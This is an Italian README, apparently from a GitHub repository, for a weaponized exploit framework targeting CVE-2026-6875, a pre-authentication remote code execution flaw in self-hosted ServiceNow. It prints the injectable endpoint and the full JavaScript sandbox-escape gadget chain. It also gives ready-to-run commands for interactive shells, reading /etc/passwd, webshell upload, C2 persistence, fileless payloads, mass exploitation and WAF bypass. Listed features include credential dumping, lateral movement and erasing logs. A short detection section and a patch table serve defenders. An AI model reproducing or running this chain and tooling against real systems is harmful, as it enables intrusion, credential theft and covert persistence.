
CVE-2026-6875 Framework RCE Pre-Auth ServiceNow 🔥 Iniezione JS → Evasione sandbox → RCE → Root. Funzionalità: --detect, --exec, shell reverse/interattiva, threading batch, bypass WAF, persistenza, movimento laterale, dump delle credenziali, esecuzione fileless, pulizia delle tracce. 🛡️ CVSS 9.5 sfruttato attivamente. Solo uso autorizzato e legale. Rimani legale. 🔒

Framework di Exploit e Verificatore Sicuro
Solo per test di sicurezza autorizzati.
Questo strumento è fornito esclusivamente a scopo educativo e per test di penetrazione autorizzati.
Gli autori e i collaboratori non sono responsabili per qualsiasi uso improprio o danno causato da questo software. Gli utenti sono gli unici responsabili di assicurarsi di avere il permesso scritto esplicito del proprietario del target prima di testare. L'accesso non autorizzato ai sistemi informatici è illegale ai sensi del Computer Fraud and Abuse Act (CFAA) e di leggi simili in tutto il mondo.
Utilizzando questo software, accetti di:
⚠️ AVVERTENZA: Questa vulnerabilità è attivamente sfruttata in natura. L'uso non autorizzato può comportare gravi conseguenze legali.
CVE-2026-6875 è una vulnerabilità critica di Esecuzione Remota di Codice (RCE) non autenticata nella Piattaforma AI di ServiceNow (ex Now Platform). Consente agli aggressori di bypassare la sandbox degli script ed eseguire comandi di sistema arbitrari con i privilegi dell'applicazione ServiceNow.
Iniezione JavaScript: L'endpoint assessment_thanks.do accetta un parametro sysparm_assessable_type. Anteponendo javascript: al valore, un aggressore inietta codice JavaScript arbitrario.
Evasione della Sandbox: Un sofisticato gadget di evasione della sandbox (che combina DiscoveryFunctions.getCacheObjectForTable, AbstractAjaxProcessor e Class.create) rimuove la restrizione della sandbox JavaScript.
Esecuzione Remota di Codice: Il codice Java iniettato (tramite java.lang.Runtime.exec()) viene eseguito con i privilegi dell'applicazione ServiceNow, consentendo il pieno compromesso del sistema.
Escalation dei Privilegi: I moduli post‑exploitation tentano di elevare i privilegi a root tramite configurazioni sudo errate, binari SUID, cron job scrivibili o exploit del kernel.
exploit.py)L'exploit weaponizzato completo combina l'iniezione JavaScript e l'evasione della sandbox per ottenere l'esecuzione remota di codice, con moduli post‑exploitation avanzati per persistenza, movimento laterale e dump delle credenziali.
verifier.py)Il verificatore sicuro esegue un rilevamento non intrusivo della vulnerabilità senza eseguire payload dannosi o apportare modifiche al sistema.
pip (per la libreria requests)pip install requests urllib3
[!NOTE]
exploit.pyusa solo la libreria standard per le funzionalità principali;requestsè richiesto solo per la funzionalità--detect, le notifiche--webhooke il verificatore sicuro.
verifier.py)# Single target verification
python verifier.py -u 192.168.1.100
# Custom port and path
python verifier.py -u 10.0.0.5 -p 8443 --path /snow
# Mass scan from file
python verifier.py -l targets.txt -o results.json
# Quiet mode (only vulnerable targets)
python verifier.py -u 192.168.1.100 -q
# Increase timeout for slow targets
python verifier.py -u servicenow.example.com --timeout 60
# Custom User-Agent
python verifier.py -u 192.168.1.100 --user-agent "MyScanner/1.0"
# Interactive shell on target
python exploit.py -u 192.168.1.100
# Execute a single command
python exploit.py -u 192.168.1.100 --exec "id && whoami"
# Read a file
python exploit.py -u 192.168.1.100 --read-file /etc/passwd
# Enable detection before exploitation
python exploit.py -u 192.168.1.100 --detect
# Attempt root privilege escalation
python exploit.py -u 192.168.1.100 --privesc
# Upload a webshell
python exploit.py -u 192.168.1.100 --upload shell.jsp
# Install persistence with C2
python exploit.py -u 192.168.1.100 --persistence --c2-host 10.0.0.5 --c2-port 4444
# Clean tracks after exploit
python exploit.py -u 192.168.1.100 --clean
# Use fileless (memory) payload
python exploit.py -u 192.168.1.100 --fileless --c2-host 10.0.0.5 --c2-port 4444
# Mass exploit from file (50 threads)
python exploit.py -l targets.txt -m 50 --exec "uname -a"
# Custom callback server port
python exploit.py -u 192.168.1.100 --callback-port 9090
# Enable WAF bypass techniques
python exploit.py -u 192.168.1.100 --waf-bypass
# Send notifications via webhook
python exploit.py -u 192.168.1.100 --webhook https://myhook.com/snow
# Pipe mode (read command from stdin)
echo "cat /etc/hosts" | python exploit.py -u 192.168.1.100
# Custom port and path
python exploit.py -u 10.0.0.5 -p 8443 --path /snow
# Disable TLS verification (for self-signed certs)
python exploit.py -u 192.168.1.100 --insecure-tls
# Custom timeout and retries
python exploit.py -u 192.168.1.100 -t 60 -r 5 -d 2.0
⚠️ Importante: Le istanze ServiceNow Cloud vengono patchate automaticamente. Questa vulnerabilità colpisce principalmente le implementazioni self‑hosted.
La vulnerabilità risiede nell'endpoint assessment_thanks.do, che accetta un parametro sysparm_assessable_type. Fornendo un valore che inizia con javascript:, la piattaforma valuta il successivo codice JavaScript nel contesto di sistema.
Endpoint Vulnerabile:
POST /assessment_thanks.do sysparm_assessable_type=javascript:gs.print('test')
Il codice iniettato è inizialmente confinato in una sandbox. Tuttavia, sfruttando la seguente catena:
javascript:
var s="<payload>";
DiscoveryFunctions.getCacheObjectForTable=Object;
var a={};a.get=Object;
var b=new AbstractAjaxProcessor();
b.initialize=DiscoveryFunctions.getFirstValueFromTable(
a,"",DiscoveryFunctions.getFirstValueFromTable(
a,"",DiscoveryFunctions.getFirstValueFromTable(
a,"",global,"WorkflowIconsSCR",""),"prototype",""),"initialize","");
b.a=Class.create();b.a(s);
La sandbox viene bypassata, garantendo l'accesso completo a classi Java come java.lang.Runtime.
Cerca nei file .properties, .xml, .conf password, chiavi API e segreti:
/opt/ServiceNow/conf/*.xml/var/log/ServiceNow/*.log/etc/passwd, /etc/shadowInstalla backdoor tramite:
*/5 * * * *), servizi systemd, chiavi SSHschtasks), chiavi di esecuzione del Registro di sistemaScansiona la sottorete locale per altre istanze ServiceNow o host SSH e riutilizza le credenziali scoperte.
Compila una classe Java al volo, la carica tramite ClassLoader e la esegue in memoria (nessuna scrittura su disco).
{/*comment*/})\u0077 per w)ne\u0077 per new)Cerca nei tuoi log ServiceNow:
extraweb_access.log – richieste a /assessment_thanks.do con sysparm_assessable_type contenente:
javascript:DiscoveryFunctions.getCacheObjectForTableAbstractAjaxProcessor/var/tmp/ (ad es., shell.jsp, script .sh)/etc/passwd, /etc/shadow o ~/.ssh/authorized_keys modificaticrontab -l)/etc/systemd/system/)/bin/bash -i, nc, curl, wget, python -c)[+] CVE-2026-15409/15410 - SonicWall SMA1000 Multi-Exploit Framework
https://github.com/tc4dy/CVE-2026-15409-15410-Framework
[+] CVE-2026-41091 - SolarFlare (RedSun) Microsoft Defender LPE
https://github.com/tc4dy/CVE-2026-41091-PoC-Exploit
[+] CVE-2026-57821 - Apache Fineract SQL Injection Toolkit
https://github.com/tc4dy/CVE-2026-57821-PoC-Exploit
[+] CVE-2026-41940 - cPanel/WHM Authentication Bypass
https://github.com/tc4dy/CVE-2026-41940-PoC-Exploit
| Attributo | Valore |
|---|
| 📅 Scoperta | 1 aprile 2026 (Searchlight Cyber) |
| ⚠️ Punteggio CVSS | 9.5 (CRITICO) |
| 📋 CISA KEV | Aggiunta il 13 luglio 2026 |
| 🎯 Prodotti Interessati | Piattaforma AI di ServiceNow self‑hosted |
| 🔄 Versioni Corrette | Brazil EA/GA, Australia Patch 2, Zurich Patch 7b/9, Yokohama Patch 12 Hot Fix 1b/13 |
| 🔓 Autenticazione | Non richiesta (Pre‑Auth) |
| 🌍 Sfruttamento Attivo | Confermato in natura (luglio 2026) |
| Funzionalità | Descrizione |
|---|
| 🚀 Iniezione JavaScript | Inietta il payload tramite il parametro sysparm_assessable_type. |
| 💻 Evasione della Sandbox | Bypassa la sandbox degli script di ServiceNow per eseguire codice Java arbitrario. |
| 🔐 Shell Interattiva | Avvia una shell live con supporto per più comandi. |
| 👑 Privesc Root | Verifica configurazioni sudo errate, binari SUID e cron job. |
| 📁 Operazioni sui File | Carica webshell, legge/scarica file tramite codifica base64. |
| 🌐 Scansione in Batch | Sfrutta più target in massa con il threading (flag -l). |
| 🎯 Rilevamento Sicuro | Flag --detect opzionale per la verifica non intrusiva della vulnerabilità. |
| ⚙️ Bypass WAF | Tecniche di offuscamento integrate per eludere WAF/IDS (6 tecniche). |
| 🧩 Persistenza | Installa backdoor cron/systemd/schtasks. |
| 🔍 Movimento Laterale | Scansiona la rete locale per altri host vulnerabili e tenta la propagazione SSH/SSRF. |
| 🧹 Pulizia delle Tracce | Rimuove log, cronologia bash e trail di audit. |
| 💾 Esecuzione Fileless | Usa Java ClassLoader per eseguire payload residenti in memoria senza scrivere su disco. |
| 🔌 Server di Callback | Server HTTP integrato per ricevere l'output dei comandi (opzionale). |
| 📢 Notifiche Webhook | Invia i risultati a un URL personalizzato (Slack, Discord, ecc.). |
| 🪟 Multi‑Piattaforma | Supporta target Linux e Windows (cmd.exe / PowerShell). |
| 🔒 Thread‑Safe | Usa meccanismi di blocco per operazioni concorrenti. |
| 📊 Rilevamento Versione | Rileva la versione di ServiceNow (Zurich/Brazil/Australia/Yokohama). |
| Comando | Descrizione |
|---|
exec <cmd> | Esegue un comando di sistema |
upload <local> [remote] | Carica una webshell sul target |
download <remote> | Scarica e mostra il contenuto del file |
privesc | Tenta l'escalation dei privilegi |
reverse <host> <port> | Invia una reverse shell |
dumpcred | Estrae le credenziali dalle configurazioni di ServiceNow |
persist <host> <port> | Installa la persistenza (cron/systemd/schtasks) |
lateral | Tenta il movimento laterale |
clean | Pulisce le tracce (log, cronologia) |
memory <host> <port> | Esegue il payload Java fileless |
exit | Esce dalla shell interattiva |
| Funzionalità | Descrizione |
|---|
| 🔍 Rilevamento ServiceNow | Identifica le istanze ServiceNow tramite più endpoint. |
| 📊 Rilevamento Versione | Rileva release ServiceNow specifiche e livelli di patch. |
| 🧪 Test di Iniezione JavaScript | Verifica la vulnerabilità di iniezione utilizzando payload gs.print() sicuri. |
| 🔒 Test di Evasione della Sandbox | Verifica l'evasione della sandbox senza comandi distruttivi. |
| 📈 Punteggio di Confidenza | Fornisce una percentuale di confidenza (85‑95%) basata sulle evidenze. |
| 📋 Output JSON | Esporta i risultati in formato JSON per il reporting. |
| 🔄 Scansione di Massa | Scansiona più target con supporto al threading. |
| 🎯 Non Intrusivo | Esegue solo il benigno uname -a per le informazioni di sistema. |
| Release di ServiceNow | Versioni Vulnerabili | Versioni Corrette |
|---|
| Brazil | EA, GA | Corretta (post‑GA) |
| Australia | Prima della Patch 2 | Patch 2+ |
| Zurich | Prima della Patch 7b, Patch 9 | Patch 7b, Patch 9+ |
| Yokohama | Prima della Patch 12 Hot Fix 1b | Patch 12 Hot Fix 1b, Patch 13 |
| Altre release | Sconosciute | Consultare l'avviso ufficiale |